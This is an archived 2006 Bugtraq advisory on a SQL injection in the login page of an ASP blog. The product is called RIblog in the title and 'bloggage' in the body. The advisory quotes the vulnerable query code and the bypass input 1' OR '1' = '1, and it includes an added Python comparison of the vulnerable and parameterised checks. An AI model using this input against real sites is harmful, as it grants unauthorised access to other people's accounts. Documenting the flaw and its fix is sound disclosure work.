Open Source and information security mailing list archives
Date: 23 Apr 2006 10:32:11 -0000
From: omnipresent@...il.it
To: bugtraq@...urityfocus.com
Subject: RIblog Remote SQL Injection Exploit


------------------------------------------------------------------
          - RIblog Remote SQL Injection Exploit -
   -= http://colander.altervista.org/advisory/riblog.txt =-
------------------------------------------------------------------

			-= RIblog =-



Omnipresent
April 21, 2006


Vulnerability(s):
----------------
SQL Injection


Product:
--------
bloggage

Vendor:
--------
http://romedahl.com


Description of product:
-----------------------

It is a blog.

A fuller description is not available yet.


Vulnerability / Exploit:
------------------------

This software is vulnerable to a Remote SQL Injection.

Take a look at this script in 

[...]

doLogin = Request.Form("login") 'login flag taken straight from the POST body


If doLogin = "" Then

 Trim(Request.Form("login")) 'note: the trimmed value is discarded, doLogin is never reassigned

End If

' Submit to self
If doLogin = "true" Then


			' Both values come from the form untouched except for Trim(); no quoting or escaping
			If sUserName = "" Then
			 sUserName = Trim(Request.Form("UserName"))
			End If

			If sPassword = "" Then
			 sPassword = Trim(Request.Form("Password"))
			End If


			Set myRecSet = server.createobject("adodb.recordset")
			strConn = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & strDBPath & ";"
			Set myConn = server.createobject("adodb.connection")
			myConn.open strConn

			' User-controlled strings are concatenated directly into the SQL text
			strSQL = "SELECT * FROM tUser WHERE  fuser = '"& sUserName  &"' and fpassword = '" & sPassword &"';"


[...]

As you can see, the string strSQL is the query passed to the DB, and the variables sUserName and sPassword are not
sanitised before being concatenated into it. An attacker can therefore exploit this vulnerability by injecting SQL code, as in the example below:

1' OR '1' = '1

The attacker has to put the string above in both the username and password fields.


The resulting query is:

strSQL = "SELECT * FROM tUser WHERE  fuser = '1' OR '1' ='1' and fpassword = '1' OR '1' ='1';"

Because AND binds more tightly than OR, the WHERE clause evaluates to true for every row, so the query returns the user table regardless of the credentials supplied.

The attacker can thereby gain access to the blog and, for example, edit posts or view comments.
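The following is an added example, not code from the advisory or from the RIblog product, that reproduces the login check above in Python. It assumes sqlite3 as a stand-in for the product's Jet/Access database, a constructed tUser row, and the column names fuser and fpassword taken from the advisory. It shows the concatenated query accepting the advisory's input and the same check rewritten with bound parameters rejecting it, which is the fix a maintainer would apply (ADODB.Command with parameters in classic ASP).

```python
import sqlite3

# Payload quoted in the advisory, used here only to show the two code paths diverge.
ADVISORY_INPUT = "1' OR '1' = '1"


def make_db():
    """Constructed in-memory stand-in for the product's tUser table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tUser (fuser TEXT, fpassword TEXT)")
    # Constructed credentials; not taken from any real installation.
    conn.execute("INSERT INTO tUser VALUES ('admin', 's3cret')")
    return conn


def build_vulnerable_sql(username, password):
    """Mirror the advisory's strSQL string concatenation exactly."""
    return ("SELECT * FROM tUser WHERE  fuser = '" + username
            + "' and fpassword = '" + password + "';")


def login_vulnerable(conn, username, password):
    """Login check as the product does it: raw SQL text built from form input."""
    rows = conn.execute(build_vulnerable_sql(username, password)).fetchall()
    return len(rows) > 0


def login_parameterized(conn, username, password):
    """Hardened check: the driver binds the values, so quotes in input stay data."""
    rows = conn.execute(
        "SELECT * FROM tUser WHERE fuser = ? AND fpassword = ?",
        (username, password),
    ).fetchall()
    return len(rows) > 0


def compare(conn, username, password):
    """Return both outcomes so the difference is visible for a given input."""
    return {
        "vulnerable": login_vulnerable(conn, username, password),
        "parameterized": login_parameterized(conn, username, password),
    }


if __name__ == "__main__":
    db = make_db()
    print("valid credentials:", compare(db, "admin", "s3cret"))
    print("advisory input:   ", compare(db, ADVISORY_INPUT, ADVISORY_INPUT))
```

Python's sqlite3 refuses stacked statements, so this models only the boolean bypass the advisory describes; the Jet OLE DB provider used by the product may behave differently on other inputs, which is a further reason to bind parameters rather than rely on filtering.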


Vendor Status
-------------

Not informed!

Credits:
--------
omnipresent
omnipresent@...il.it

